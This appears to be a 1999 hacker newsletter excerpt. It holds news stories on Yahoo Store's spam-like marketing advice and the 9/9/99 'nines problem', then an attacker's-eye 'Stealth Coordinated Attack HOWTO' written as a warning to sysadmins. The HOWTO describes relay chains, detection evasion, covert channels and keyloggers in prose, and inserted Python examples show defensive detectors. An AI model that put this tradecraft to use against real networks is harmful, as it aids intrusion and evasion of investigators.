But to Seebach, there is no question about the nature of Yahoo's advice. "They didn't say 'find one person.' They said 'find people' -- plural -- and they acknowledge that they'd [the Yahoo Mail service] kick people off for it. The community standard is that that's considered spam."
Elsewhere in the customer advice, Yahoo Store also instructs users on how to get search engines to display a Yahoo Store site address higher in the list of search results. This activity, widely considered to be corrupting search results, is similarly disdained by the Net community.

Nick Nicholas, executive director of the Mail Abuse Prevention System, noted that Yahoo's recommendations on search results are once again contradictory. "It's particular surprising to have that come from Yahoo. Because people are trying this all the time with sites like Yahoo."

But Brady said the search advice is sound and not seeking to trick search engines. "We're clearly not advocating putting any irrelevant words in there. It's more of an education about how search engines work. If you have your front page and it's all graphics and your competitor's is all text -- and you're trying to understand why your competitors come up first in a search engine -- this is a great education. It's design guidelines."

He did acknowledge that the company may need to adjust the language of the instructions. "We remain strongly anti-spam and nothing we suggest or promote is in any way spam like we believe.... But I can see where potentially there's a bit of a gray area here."

A gray area is problematic when it comes to stemming the growth of the Net's huge spam problem, said J.D. Falk, board member of the Coalition Against Unsolicited Commercial Email. "The problem with a gray area is that there's so many spammers out there that anybody in the gray area -- some people are going to consider it spam. My advice is to stay completely out of gray area until the complete mass of spam dies down."

Editor's note: By late Thursday, after this story was written, the page described above was changed. Yahoo removed the paragraph encouraging mass email and the note warning users not to use Yahoo for such mailings. Because the article was accurate when written, Wired News stands by the story.
@HWA

41.0 "NINES PROBLEM"
~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Friday 27th August 1999 on 9:51 pm CET

Everybody is panicking over the Y2K bug, which will hit us in 4 months. But did you hear of the nines problem? At issue is the impact of an old programming convention that used four nines in a row -- 9999 -- to tell computers to stop processing data or to perform a special task. Read about it on Wired.

http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Will 9/9/99 create Y2K-like havoc?

By Jim Wolf, Reuters
August 27, 1999 7:16 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html

WASHINGTON -- A computer glitch that could cause system failures on Sept. 9 -- 9/9/99 -- is about to get a lot of attention.

In a kind of dry run for the Year 2000 glitch, authorities and computer scientists worldwide will be scrutinizing networks on that Thursday for any fallout from the so-called "Nines Problem."

At issue is the impact of an old programming convention that used four nines in a row -- 9999 -- to tell computers to stop processing data or to perform a special task.

End of file

In the relatively unlikely case that systems misread Sept. 9 as 9999 -- without zeros as in 09/09 -- they might confuse the nines with what programmers call an "end of file" marker.

Four nines in the date field could also trigger a grand total or a sorting operation, said Jim Kelton, president of Software Unlimited, an Irvine, California, software consulting firm specialized in networks and Y2K.

"All nines could be interpreted as almost anything," he said. For instance, the nines might cause computers to disregard data received after Sept. 9, causing a cutoff in the updating of bank records.
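The failure mode the article describes only arises when the date is written without zero padding, so that 9/9/99 becomes the four characters "9999" the legacy code reserves as its end-of-file marker. The following is an added example, not from the ZDNN story: a small constructed batch reader with that sentinel convention is run over the same five days of records twice, once with unpadded dates and once with zero-padded ones, and a helper enumerates every calendar date of a year whose unpadded rendering collides with the sentinel. The record layout and the reader are assumptions made for the illustration.

```python
"""The 'nines problem' worked through on a constructed legacy batch reader.

Added example, not code from the article. The reader stops at a record whose
date field reads 9999, the old end-of-file convention; the records are
constructed inline.
"""
import datetime

EOF_SENTINEL = "9999"   # legacy convention: all nines in the date field = stop


def legacy_date(d, zero_pad):
    """Render a date the way the batch feed does: MMDDYY with or without zero padding."""
    if zero_pad:
        return d.strftime("%m%d%y")           # 09/09/99 -> "090999"
    return "%d%d%02d" % (d.month, d.day, d.year % 100)   # 9/9/99 -> "9999"


def build_batch(zero_pad):
    """Constructed sample: one transaction per day from Sept. 7 to Sept. 11, 1999."""
    days = [datetime.date(1999, 9, n) for n in range(7, 12)]
    return [(legacy_date(d, zero_pad), 100 * i) for i, d in enumerate(days, 1)]


def legacy_post_transactions(records):
    """Sum the amounts until the sentinel shows up, as the old code would.

    Returns (records_processed, total_posted).
    """
    total, processed = 0, 0
    for date_field, amount in records:
        if date_field == EOF_SENTINEL:        # the collision: a real date looks like EOF
            break
        total += amount
        processed += 1
    return processed, total


def dates_colliding_with_sentinel(year):
    """Every date in `year` whose unpadded rendering equals the sentinel."""
    day = datetime.date(year, 1, 1)
    hits = []
    while day.year == year:
        if legacy_date(day, zero_pad=False) == EOF_SENTINEL:
            hits.append(day)
        day += datetime.timedelta(days=1)
    return hits


if __name__ == "__main__":
    print("unpadded :", legacy_post_transactions(build_batch(zero_pad=False)))
    print("padded   :", legacy_post_transactions(build_batch(zero_pad=True)))
    print("collisions in 1999:", dates_colliding_with_sentinel(1999))
```

With unpadded dates the reader posts only the first two days and silently drops everything from Sept. 9 onward, which is exactly the "cutoff in the updating of bank records" the article warns about; with zero-padded dates all five records post. The enumeration shows that Sept. 9 is the only date in 1999 that can collide, which is why the risk is confined to feeds that both omit padding and use a bare 9999 as a control value.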
The glitch, which the financial industry has been fixing as part of its $9 billion Y2K preparations, could figure in customized applications written in decades-old computer languages such as FORTRAN, COBOL and RPG, experts say.

Robert Banghart, director of development at Unisolve, a Costa Mesa, California, software firm working on the Y2K glitch, said a string of nines long had been used to tell computers to ''end a routine,'' or no longer execute certain instructions.

Rehearsal for preparedness

In a worst-case scenario, four nines in a date field could spark problems not unlike Y2K, a coding glitch that threatens to keep ill-prepared computers from distinguishing the year 2000 from the year 1900.

The U.N.-backed International Y2K Cooperation Center, a global clearing house for millennium bug data, is using Sept. 9 to rehearse a plan aimed at keeping up-to-the-minute tabs on how the world is faring as it enters 2000.

"It's a dry run for the rollover date," said Lisa Pelegrin, spokeswoman for the Washington-based, World Bank-funded center. "We will be testing our reporting system."

That reporting system, to be updated in real time on the center's Web site, www.iy2kcc.org, ultimately will reflect the input of 170 or more national Y2K coordinators.

On the center's Sept. 9 shakeout run, about 15 countries are expected to take part. For the most part, they are members of its steering committee -- Britain, Bulgaria, Chile, Gambia, Iceland, Japan, Mexico, Morocco, Netherlands, Philippines, South Korea and the United States. New Zealand and Australia, also active backers, are due to report in.

Graeme Inchley, Australia's Y2K coordinator, told Reuters that he was ''absolutely convinced'' Sept. 9 would go by without a hitch.

First test for Y2K center

Sept. 9 also will mark the first test of a $40 million-dollar U.S. inter-agency Y2K center meant to give U.S. decision makers a round-the-clock view of Y2K problems in their areas of responsibility.

Likewise, on Sept. 8 and 9, the North American Electric Reliability Council, an industry group, will rehearse an emergency scenario to test operating, communications and contingency responses for the Y2K transition.

"If all goes well in this drill, the electric utilities can pat themselves on the back; if not, they may be tempted to blame the 'nines','' said Janis Gogan, an information technology expert at Bentley College in Waltham, Mass.

Mitch Ratcliffe, editorial director of publisher Ziff Davis's Y2K Web site, rated Sept. 9's chance of triggering problems as extremely low because the date would have to be misrepresented -- without zeros as in 09/09 -- "in a way that defies logic."

"The Nines Problem is almost totally a myth," he said.

@HWA

42.0 Stealth Coordinated Attack HOWTO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This was emailed to us by the author and is a very well written piece full of important information for the sysadmin and hacker alike, definitely a must-read by all. - Ed

Contributed by Dragos Ruiu

(note: this was written before the l0pht antisniff announcement was made so that's why the future tense. And I'm not talking about route table hijacking as the DHCP vulnerability :-).... cheers, --dr)

Cautionary Tales: Stealth Coordinated Attack HOWTO

By Dragos Ruiu

A lot has been written in the popular media about the effects of hostile coordinated traffic attacks (hacking), and, as a sysadmin, I find my systems increasingly under attack by hostile sources. Two years ago, we got mapped and port-scanned for vulnerabilities once a month. One year ago the scan frequency was up to once a week, and these days we get scanned several times a day with real attack attempts at least once a week. The Internet is becoming an increasingly hostile place and the traditional defenses and documentation of attack systems seem woefully inadequate. With this article, I hope to remedy some of the misconceptions about security that some admins have.
Yes, I hope that descriptions of these attack techniques scare you into beefing up security on your home PC, at your office, everywhere.

Over the last fifteen or so years, as a sysadmin of network-connected systems, I have seen the knowledge of computer technologies propagate across the spectrum of the human population, bringing with it the traditional demographic, including the stupid people and the malicious people as well as the helpful and the apathetic people. With the burst of Internet technology over the last few years there has also been a burst of new computer adoption, increasing pervasiveness of computing and networks, and increasing occurrences of, and danger/damage caused by, hostile computer use. While I don't believe for a second the over-inflated, hyped-up estimates of the cost of these hacker intrusions bandied about in the media, I can vouch that the problem is real.

As the chief technical weenie of our company, NetSentry Technology, I've been manning the front line defenses of our company net equipment. I've also been documenting the increasingly hostile nature of attacks on our network and would like to share some of my experiences in this area. The technical level of the attacks is increasing at an alarming pace, and I haven't seen any documentation of these new attack techniques yet, so here are some cautionary tales culled from our real-life experiences. My hope is that after reading this you will re-examine your own network security. Most organizations are woefully under-protected. The ISPs are having increasing difficulties in responding to customer requests for assistance in intrusion cases, and the police are even further under-staffed and out-gunned technologically. So increasingly, it is left to companies to fend for themselves to secure their systems. Here is what you have to worry about.

I wish I could take credit for all the techniques described here, but a majority of them were derived from analysis of traffic used for hostile attacks on us.
Credit belongs to the anonymous hackers that have taken a run at our defenses. I write the following from the point of view of the attacker to emphasize the point that security is vastly neglected at most sites, and because I want to ask: what will you do when faced with these attacks? And what can you do with your current defensive equipment? Not much, I wager.

The phases of a successful attack are A) Reconnaissance, B) Vulnerability identification, C) Penetration, D) Control, E) Embedding, F) Data extraction/modification, and G) Attack relay.

A) Reconnaissance

The first part of a successful attack is to get to know the network topology in the region surrounding your target and the parties it communicates with. This is also an important part of the penetration of each successive layer of your target's networks. Currently, the best publicly available tool for net topology identification is Fyodor's excellent "nmap" program and derivatives. The objective of the reconnaissance is to understand as much as possible about the target and to identify attack destinations, defenses and potential attack relay bases. In private circulation, the following tools exist or will soon exist:

Attack Tool: Coordinated multi-site scanners. Mapping software that distributes the mapping "probe" packets to be sent to the destination addresses and nearby sites over a number of geographically dispersed attack sites, and trickles them out at low rates to avoid detection, so that there never is a lot of traffic at any one time or from any particular site (see stealth section). The results of the pokes and probes at the target that these systems send are summed and collated to build a picture of what equipment the target has installed.
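A per-source port-scan detector, which is what most 1999-era tools implemented, sees nothing when the probes are trickled out from many sites; correlating by target over a long window does. The following detector is an added example, not code from the article or from NetSentry, and runs over constructed firewall log lines in an assumed "time src -> dst:port proto ACTION" format:

```python
"""Added example: target-centric detection of low-and-slow, multi-source scans."""
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "time src dst port action")

# Constructed sample log (assumed format, not real data): one target, 192.0.2.10,
# is probed on eight ports over 22 hours by six different sources, no source
# touching more than two ports. 192.0.2.200 is a legitimate web client.
SAMPLE_LOG = """\
1999-08-20T01:05:11 203.0.113.7 -> 192.0.2.10:21 tcp DROP
1999-08-20T03:40:02 198.51.100.23 -> 192.0.2.10:23 tcp DROP
1999-08-20T06:12:45 192.0.2.200 -> 192.0.2.10:80 tcp ACCEPT
1999-08-20T07:18:30 203.0.113.99 -> 192.0.2.10:25 tcp DROP
1999-08-20T10:55:19 198.51.100.8 -> 192.0.2.10:53 tcp DROP
1999-08-20T13:02:57 203.0.113.7 -> 192.0.2.10:110 tcp DROP
1999-08-20T15:47:03 192.0.2.200 -> 192.0.2.10:80 tcp ACCEPT
1999-08-20T17:29:41 198.51.100.61 -> 192.0.2.10:143 tcp DROP
1999-08-20T20:11:08 203.0.113.14 -> 192.0.2.10:111 tcp DROP
1999-08-20T22:38:56 198.51.100.23 -> 192.0.2.10:2049 tcp DROP
1999-08-20T23:59:10 203.0.113.7 -> 192.0.2.11:80 tcp ACCEPT
"""


def parse_log(text):
    """Turn the constructed log format into Event tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _arrow, dst_port, _proto, action = line.split()
        dst, port = dst_port.rsplit(":", 1)
        events.append(Event(datetime.fromisoformat(ts), src, dst, int(port), action))
    return events


def _dropped(events):
    # Only rejected packets count as probes: legitimate peers rarely hit closed ports.
    return [e for e in events if e.action == "DROP"]


def per_source_scans(events, threshold=5, window=timedelta(hours=1)):
    """Classic detector: one source probing many ports on one target in a short window.
    Returns the set of (src, dst) pairs that crossed the threshold."""
    by_pair = defaultdict(list)
    for e in _dropped(events):
        by_pair[(e.src, e.dst)].append(e)
    hits = set()
    for pair, evs in by_pair.items():
        evs.sort(key=lambda e: e.time)
        for i, start in enumerate(evs):
            ports = {x.port for x in evs[i:] if x.time - start.time <= window}
            if len(ports) >= threshold:
                hits.add(pair)
                break
    return hits


def target_centric_scans(events, threshold=6, window=timedelta(hours=24)):
    """Coordinated-scan detector: distinct ports probed on one target by ANY sources
    within a long sliding window. Returns {dst: {"ports": [...], "sources": [...]}}."""
    by_dst = defaultdict(list)
    for e in _dropped(events):
        by_dst[e.dst].append(e)
    alerts = {}
    for dst, evs in by_dst.items():
        evs.sort(key=lambda e: e.time)
        for i, start in enumerate(evs):
            in_win = [x for x in evs[i:] if x.time - start.time <= window]
            ports = {x.port for x in in_win}
            if len(ports) >= threshold:
                alerts[dst] = {"ports": sorted(ports),
                               "sources": sorted({x.src for x in in_win})}
                break
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("per-source hits:", per_source_scans(evs))        # empty: each source is quiet
    print("target-centric:", target_centric_scans(evs))     # 192.0.2.10 flagged
```

The thresholds and the 24-hour window are assumptions to tune per site; the point is that the aggregation key is the target, not the source.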
There was a lot of noise in the press earlier this year as some of the crude versions of these coordinated scan tools were aimed at US military sites, but either the operators of these tools have improved them to the point where the relatively immature military defense systems no longer identify these scans, or the military has found some other threat to highlight in the press and use to get funding.

Attack Tool: Sniffer Detectors. Sniffers produce unique traffic patterns that may be detected. They also provide some interesting penetration vulnerabilities, as their network interfaces are placed in promiscuous mode, allowing all packets past the address filters to be processed by network stacks and applications. Some attack methods directly target security systems, which, ironically enough, are often notoriously insecure themselves. Once the security system is penetrated, all kinds of nice information like traffic patterns and passwords may be gleaned, and evidence of your attacks can be conveniently removed. And because of promiscuous listening in the sniffer, you can even take it out with traffic destined for a different system.

Attack Tool: DNS Zone transfer. A DNS zone lists the externally accessible points a company maintains: a nice map of the externally visible systems that your target has put on the Internet and a great attack point list. Not many sysadmins go over the name server records closely enough to detect this; however, the more advanced intrusion detection systems are getting better at identifying these kinds of transfers as precursors to an attack.

The important information to gather is the DNS names and addresses of the target's hosts and neighbors. Then you must further identify the OS and open port configuration of each of your target's systems. The latter is determined using site scanners and analyzing the responses that a site delivers.
Current tools such as "nmap" and "queso" are getting very good at determining device, OS version and some network application configuration information from careful analysis of the timing and contents of responses to probing or mapping traffic. The OS and port configuration are used to identify systems that could have software packages with vulnerabilities and bugs open for exploits.

Knowing who your target's ISPs are, by analysis of address use, can provide useful attack bases for your onslaught. Getting into their ISP's equipment and servers first could enable you to get important information about them, and subverting equipment installed on the same network links as your target can let you glean important information such as the traffic patterns of your target, all without your target even suspecting. It may also be easier to penetrate the ISP than a secure target. Some ISPs such as @Home even keep extensive (but often out of date) databases listing customers' hardware and software configurations as well as other info, which, if accessed, can mitigate some of the dangers of triggering intrusion detection systems with your site scanning traffic.

Once the traffic patterns of the target's external traffic are known, a basic technique to take out a secure target is to first take over a less secure target that your main target talks to, and then come in to your main target under the cover of that site's usual traffic. Any site your target talks to periodically, including popular web sites, employees' dial-up accounts, and system traffic such as network time protocol (NTP) clocks, are all candidates for attack relays. Sprinkling your attack traffic in with large web downloads and ftp transfers will make it more difficult for security personnel to use sniffing and detection tools to identify your attack, as scrolling through reams of logs and captured data can often take more time than most network staffing levels allow.
Taking out and controlling your target's conversation peers can provide you with useful channels through your target's defensive firewalls and detection systems. Your traffic will look on all the scanners like the web site Joe in IT is surfing to, but will provide you with a nice channel right past all the firewalls to a machine inside the core of your target's net.

One useful target is the DNS caches and servers that your target uses at its ISP. Accessing the DNS logs can give you the addresses of all the sites that your target talks to, and furthermore, careful analysis can even give an indication of when the activity happened, or is happening, offering excellent potential for cover. As we'll talk about later, owning the DNS server can have many benefits. In general the DNS servers are ripe with hacking opportunities.

Another useful target is the ISP DHCP server, which is used to dynamically assign IP addresses to clients on connection, as it can be used to identify periods of system activity from the logs, and also periodically establishes connections to the client systems as the address leases expire. A common DHCP vulnerability also allows client system takeover from this ISP host. DHCP address lease expiry also provides a nice way to signal embedded attack software at pre-determined times to do things like wake up in the middle of the night and send data when no-one is looking.

An often available source of useful relay bases for attacks is other systems in the same ISP client pool (on the same modem bank, other ADSL users on the same DSLAM, or cablemodem users on the same segment), which are in many cases default-configuration Windows systems, open like Swiss cheese - typically with file-sharing turned on and personal web services enabled, a combination that sports a plethora of available vulnerabilities to exploit.
After taking out the easy "marshmallow" soft client PC, the adjacent main target can then be attacked using local subnet attacks, offering again some potentially powerful techniques for hiding from and exploiting your target's security systems. In easy cases, the equipment rack will bridge broadcast traffic between the "marshmallow" and the target, allowing address resolution traffic such as ARP and DHCP to be used for system attacks and control. For stealth, these kinds of attack bases are excellent too, because the broadcast traffic is largely repetitive, very voluminous, and mostly uninteresting, which, combined with a great immaturity among the security tools for this kind of traffic, makes it a ripe vulnerability area. Local area broadcasts can also be used as another "mapping" system, even by passively listening to traffic at the nearby "marshmallow". By recording the address lookup broadcasts from your target, you can build up that traffic pattern information so that you can sneak into the site undetected.

Another often overlooked source of mapping and reconnaissance information (and break-ins) is the management systems the ISP may be maintaining. The Simple Network Management Protocol (SNMP) that most of these systems use is a bit too simple and is ripe with vulnerabilities, rich with information (including complete remote sniffers usable to pick up passwords in some RMON MIB equipment) and lame about security.

The most powerful relay base for attacks is the ISP's router system. Once you control the paths of your target's packets, you really have them at your mercy, as you can silently redirect any of their traffic to your attack relay bases without them knowing, and other fun tricks. However, most ISPs guard their Ciscos and other routers as the most valuable resource with the most defenses, so this is really a target for the most daring and brilliant attacks.
B) Vulnerability Identification

The objective of the mapping phase is to find externally accessible traffic paths into your target's net systems. Over the last year it has been easy to see what the most popular scriptware is for the so-called script-kiddies: the low-tech, mostly teen, hackers who just download pre-compiled exploits and run them blindly against targets. The standard script-kiddy technique is to set up a broad address sweep of probe traffic across a whole section of the Internet, seeking some sort of response from the target that would indicate that software with the vulnerability the exploit uses is installed. The classic vulnerabilities that we frequently see sweeps for are:

o FTP Server Exploits. Especially vulnerable are servers with anonymous write access.
o NFS and SMB share vulnerabilities.
o Holes in POP and IMAP mail delivery servers.
o Vulnerabilities in the "bind" name daemon software.
o Web server CGI exploits (Apache, MS IIS).
o Installed control daemons such as BackOrifice.

The scans for these holes are so common these days that it is difficult for most sites to even catalog the origins of such scans. These kinds of scans are so commonplace that, as long as traffic volume and frequency are controlled, it is possible to conduct them with relative impunity. But the attacker has to be prepared for the case of zealous sysadmins who contact ISPs and complain about port-scans. Never port-scan from a node you are not prepared to have disconnected, seized or otherwise lost. Here, the best policy is to use the least useful and least connected systems in your attack fleet of controlled systems, as they may be lost or jammed and blocked by firewall software when the hostile mapping probe traffic is detected. Mapping traffic stands out like a sore thumb when pointed at systems not running the vulnerable software - if the target has the tools to analyze this kind of attack (e.g. Abacus Sentry).
A net-savvy sysadmin will be able to detect things like IMAP probes against servers not running mail software. However, even these days, targets with effective intrusion detection systems are few and far between. And sysadmins with enough time to examine, properly and frequently, all their logging systems are even fewer.

At the sites that have management and security systems, these are ripe targets too. Penetrating the security system has the best advantage of rendering the target effectively blind. I have seen experienced sysadmins dismiss unquestionable, hard evidence of tampering because their beloved and trusted, but thoroughly compromised, security sniffer shows them that there is nothing to worry about - or doesn't even show that kind of data at all.

The other factors in the attacker's favor are the egos of the network designer and IT group. Every sysadmin thinks their defensive plan is carefully thought out and "their" system couldn't possibly be penetrated. Here at NetSentry we used to contact operators of systems that had been compromised and were now being used for attacks against us. But that took many hours of fruitless attempts to convince maintenance personnel, who, if you did reach them, often didn't even understand the attack traffic their own site was launching and insisted that it "couldn't possibly be our system, it must be your equipment or monitors that are wrong." I remember very vividly one ISP we contacted while we were watching, in pretty much real time, as the attackers compromised system after system at their site and used each as a base for attacks against us: when we called, their support person and security specialist looked at some local system and decided that we couldn't possibly be correct. An hour later, as the ISP's systems being used as attack relays switched from probing to all-out denial of service flooding and attacks, we called back and everyone had happily gone home for the night there.
We never did bother to call them again, and as far as we know the attacker still owns all their systems. The only guys who really took one of our attempts at warnings seriously were the security department at a regional bank, who came in on a Saturday to put sniffers on the line - but they were a notable exception.

The best targets are those that are the most widely known, used, and difficult to take off-line or re-locate. Mail, DNS, Web and FTP servers all fall into this category. With these servers, sites that notice suspicious traffic will often not off-line them because they are critical to network operations. And even if they take them off line and restore them from backup, or otherwise keep you out, they are often forced to bring the servers back with the same vulnerability as was available for initial entry, because user complaints about the unavailability of network resources override the attempts to identify and close the hole. Like penetrating the sniffer and management systems, the mail servers also provide excellent opportunities for invisibility, by letting you monitor internal conversations, what aspects of the intrusion have been detected and what countermeasures are being mandated.

C) Penetration

The most successful hack is the one where the target doesn't even know it has been penetrated. The next best thing is that when the intrusion is detected, they won't know where it's coming from. Since the source may be detected, it's better to use attack relays so the attacker's anonymity can be maintained. The general technique is to quickly find some clueless newbie who has put his home system or office server on the net with major vulnerabilities, and use that as a relay. Never use a system with your name or organization attached to it to attack. Use several levels of indirection and make sure you cross several geographical and political boundaries to hide your trail.
ISPs in the same country often will not share log information, and this gets even more difficult across borders. I listened with sympathy when I heard a poor overworked security colleague who works for the Canadian RCMP describe the nine-month process (!) for the paperwork to request log files from U.S. ISPs. The police and ISP security departments often have their hands tied by procedure and policy and general understaffing. The more organizational and geographic boundaries your attack redirection trail can cross, the safer and more anonymous you will be.

People complain about the lack of anonymity on the net, but for those that cross that line into unauthorized systems use, there is altogether too much anonymity. It's often almost impossible to follow a chain of connections through multiple ISPs and countries. The hidden are truly anonymous on the net. Sysadmins should give up now on the romantic idea that you will be able to track down who is attacking you - it's just another bunch of random numeric addresses, and even if you trace it down to an ISP, their logs will only point to another ISP and so on.

If the attacker can knock out the target's intrusion and sniffing facilities then you can proceed to rampage through their network with relative impunity, but even if you don't have the technology to compromise such systems, there are a number of techniques you can use to make your attack more stealthy.

Attack Tools: Firewall tunnels. There are a wide variety of virtual private network and proxy programs which you can use to relay your traffic into a protected network and not make the traffic appear on an intrusion detection system. Literally dozens of such firewall "borers", such as HTTPtunnel, are available now in source and binary form.
These tunnel programs relay your traffic through the firewall and IDS systems by making it look like innocuous transfers between your "mole" system and common web sites, and other forms of traffic "chameleoning" to make it look unexceptional. These tunnels embed your attack and control traffic inside this relatively innocent looking traffic to seem like HTTP or partial TCP fragments. These tunnels can also encrypt your traffic, making it more difficult for your target to identify the penetration methods.

Most sites employ hard-shell, layered network security. That is to say, the links external to the organization have firewalls and net proxies to restrict access to the inside network. The standard technique is to have a hardened Demilitarized Zone (DMZ) made up of firewalls and security IDS systems. The most secure sites will have multiple servers and systems dedicated to these roles, but the majority of installations often rely on one inadequate server for this gatekeeper function. And once you are through this shell, which is checked most often by maintenance personnel, you are usually into the internal network that has almost no security.

Another often overlooked security breach is to use floppy-based Linux distributions such as the Trinux project, or client software for common Windows and NT systems, to carry such a tunnel program physically into the organization, where it can be surreptitiously installed on a system inside the "hard" shell. This "mole" or tunnel can then penetrate the security from the inside, where vulnerabilities are seldom checked. From this attack relay base, you can proceed to scan the internal systems and take over other servers, further embedding your control of their infrastructure.

Firewalls are hardened quite well these days. But even so, some firewall operations can be predicted and broken, in areas like the port number sequences of outbound connections.
With predictable sequence number connections, firewall connections can be hijacked and attack sequences passed through the defenses. And while firewalls are often tough, many sysadmins make mistakes and leave vulnerabilities open on the host the firewall runs on (like running Microsoft IIS on the firewall), allowing penetration and access to both the internal and external Ethernet interfaces on the box for malicious software to bridge packets between the two. Once the host with network interfaces on both segments is penetrated, packet hijack software can grab the packet and relay it to the other interface before the firewall software even sees it, essentially providing you with an invisible back-door into the target.

Some forms of firewall penetration do not even involve bypassing the firewall. One interesting attack technique is to identify sites frequently visited by the target, then taint the DNS database with a forged update to their DNS server or cache so that the next time the target client contacts the frequently visited site, the traffic is pointed to one of your attack systems instead. This attack relay system can conveniently embed your attack exploit in relayed copies of the original web site. With modern Java-enabled browsers, the client naively executes any code the supposedly well known site, which is in reality your attack relay, sends. The data is sent in response to a client's request through the firewall and walks right past the intrusion detectors, virtually indistinguishable from ordinary data. This attack mode is also available by taking over the target ISP's router or DNS server.

Other forms of stealth involve penetrating SNMP traffic statistics or nearby systems at their ISP or other peer clients to identify traffic activity. The design flaw of the Internet that makes identifying forged source addresses a difficult problem can also let you hide the origin of the attacks (so-called "spoofing").
If attack traffic is sent from (or spoofed to look like) a source that is currently sending a lot of data to the target, it makes it that much more difficult to spot the attacks. This buries the attack packet amongst reams of other voluminous data. It quickly scrolls the attack packets off the screen of sniffers and makes network security staff at the other end go through the tedious "find the needle in the haystack" procedure of sorting and filtering megabytes and megabytes of capture data if they suspect the attack. Most of the time they will not have the patience to exhaustively search for attacks by scrolling through the captures and logs, again rendering you invisible.

After penetration, further attack software can be embedded in ordinary traffic to transfer it into the target's systems. Patience is the key here. The lower the data rate that can be used to get the information in and out, the lower your chances of being detected are. Spreading out your packets, so only a few per hour are transmitted, makes your hack very difficult to detect with today's tools. (However, we have developed some special tools to counter this kind of attack.)

One of the more devious penetration methods we observed was a system that trickled data in and out in the normally unused padding at the end of user data packets. On normal sniffers and detectors, the packets looked completely innocent, as even those tools did not display the padding "garbage" used for the hack. This padding was used to install malicious software by trickling the attack executable into the target a little bit at a time, a few bytes with every packet.

Another interesting stealthy attack system that will negate most firewalls is to embed your hacking control channel for your attack bot software, and results and information back from the bot, in addressing translation requests, which by definition need to be passed on by firewalls.
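Both channels (data in Ethernet frame padding, data in ARP address fields) are invisible to a sniffer that only decodes what the protocol headers say is there, but they are cheap to check for: compare the frame length against the IP total length, and sanity-check ARP addresses against the local prefix. The following frame inspector is an added example, not code from the article; it constructs its own sample frames with dummy MAC addresses and assumes 192.0.2.0/24 as the local subnet:

```python
"""Added example: spot covert data in frame padding and in ARP address fields."""
import ipaddress
import struct

LOCAL_NET = ipaddress.ip_network("192.0.2.0/24")  # assumed local subnet
ETH_IPV4 = 0x0800
ETH_ARP = 0x0806
MIN_FRAME = 60           # minimum Ethernet frame without FCS; NICs zero-pad up to it
ARP_FMT = "!HHBBH6s4s6s4s"  # hw type, proto type, hlen, plen, opcode, smac, sip, tmac, tip
SRC_MAC = bytes.fromhex("00000c000001")  # constructed dummy MACs
DST_MAC = bytes.fromhex("00000c000002")


def _pad(frame):
    """Emulate the NIC: zero-pad short frames to the 60-byte minimum."""
    return frame + b"\x00" * max(0, MIN_FRAME - len(frame))


def build_ipv4_frame(payload, trailer=b""):
    """Constructed Ethernet+IPv4(UDP-flagged) frame. The IPv4 total length covers only
    header+payload; 'trailer' is extra data placed where padding would be."""
    eth = DST_MAC + SRC_MAC + struct.pack("!H", ETH_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, 17, 0,
                     ipaddress.ip_address("192.0.2.10").packed,
                     ipaddress.ip_address("192.0.2.20").packed)
    return _pad(eth + ip + payload + trailer)


def build_arp_request(sender_ip, target_ip, trailer=b""):
    """Constructed ARP who-has request; 'trailer' again sits in the padding area."""
    eth = b"\xff" * 6 + SRC_MAC + struct.pack("!H", ETH_ARP)
    body = struct.pack(ARP_FMT, 1, ETH_IPV4, 6, 4, 1,
                       SRC_MAC, ipaddress.ip_address(sender_ip).packed,
                       b"\x00" * 6, ipaddress.ip_address(target_ip).packed)
    return _pad(eth + body + trailer)


def inspect_frame(frame):
    """Return a list of findings (empty means the frame looks normal)."""
    findings = []
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype == ETH_IPV4:
        total_len = struct.unpack("!H", frame[16:18])[0]
        trailer = frame[14 + total_len:]
        # Legitimate padding is all zeros; anything else is carrying data the
        # IP layer never accounted for.
        if any(trailer):
            findings.append("ipv4: %d non-zero bytes beyond IP total length"
                            % sum(1 for b in trailer if b))
    elif ethertype == ETH_ARP:
        _hw, _pt, _hl, _pl, op, _smac, sip, _tmac, tip = struct.unpack(ARP_FMT, frame[14:42])
        if op not in (1, 2):
            findings.append("arp: unusual opcode %d" % op)
        # An ARP-based keylogger has to put its bytes somewhere; addresses that
        # fall outside the segment's own prefix are the obvious tell.
        for label, raw in (("sender", sip), ("target", tip)):
            addr = ipaddress.ip_address(raw)
            if addr not in LOCAL_NET:
                findings.append("arp: %s address %s outside %s" % (label, addr, LOCAL_NET))
        if any(frame[42:]):
            findings.append("arp: non-zero padding after ARP body")
    return findings


def inspect_all(frames):
    """Map each named constructed frame to its findings."""
    return {name: inspect_frame(f) for name, f in frames.items()}


SAMPLE_FRAMES = {  # constructed, not captured traffic
    "clean_ipv4": build_ipv4_frame(b"hello"),
    "padded_ipv4": build_ipv4_frame(b"hello", trailer=b"\x17\x42\x99"),
    "clean_arp": build_arp_request("192.0.2.10", "192.0.2.1"),
    "odd_arp": build_arp_request("192.0.2.10", "198.51.100.77"),
}

if __name__ == "__main__":
    for name, found in inspect_all(SAMPLE_FRAMES).items():
        print(name, "->", found or "ok")
```

A real deployment would feed captured frames in instead of the constructed ones; the two checks stay the same.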
One such clever system we experienced was an attacker who penetrated another nearby client node on an ADSL system. They then penetrated one of our systems (a sniffer, of all things) and installed a key-stroke logger that encoded the keystrokes typed at the console into the address field of Address Resolution Protocol (ARP) lookup messages, which were happily passed through the firewall and relayed to the attacker at the nearby system outside the firewall on the same subnet, which received the ARP-encoded keystrokes. This key logger even delayed, encrypted and grouped keystroke transmissions to make detection more difficult. We have also seen keyboard loggers that were clever enough to store your keystrokes on disk, in case the system was disconnected from the network (like a laptop) for a while, and then trickled them out later when the net connection was re-established. Key loggers provide easy access to most authentication tokens, scrambling keys and passwords.

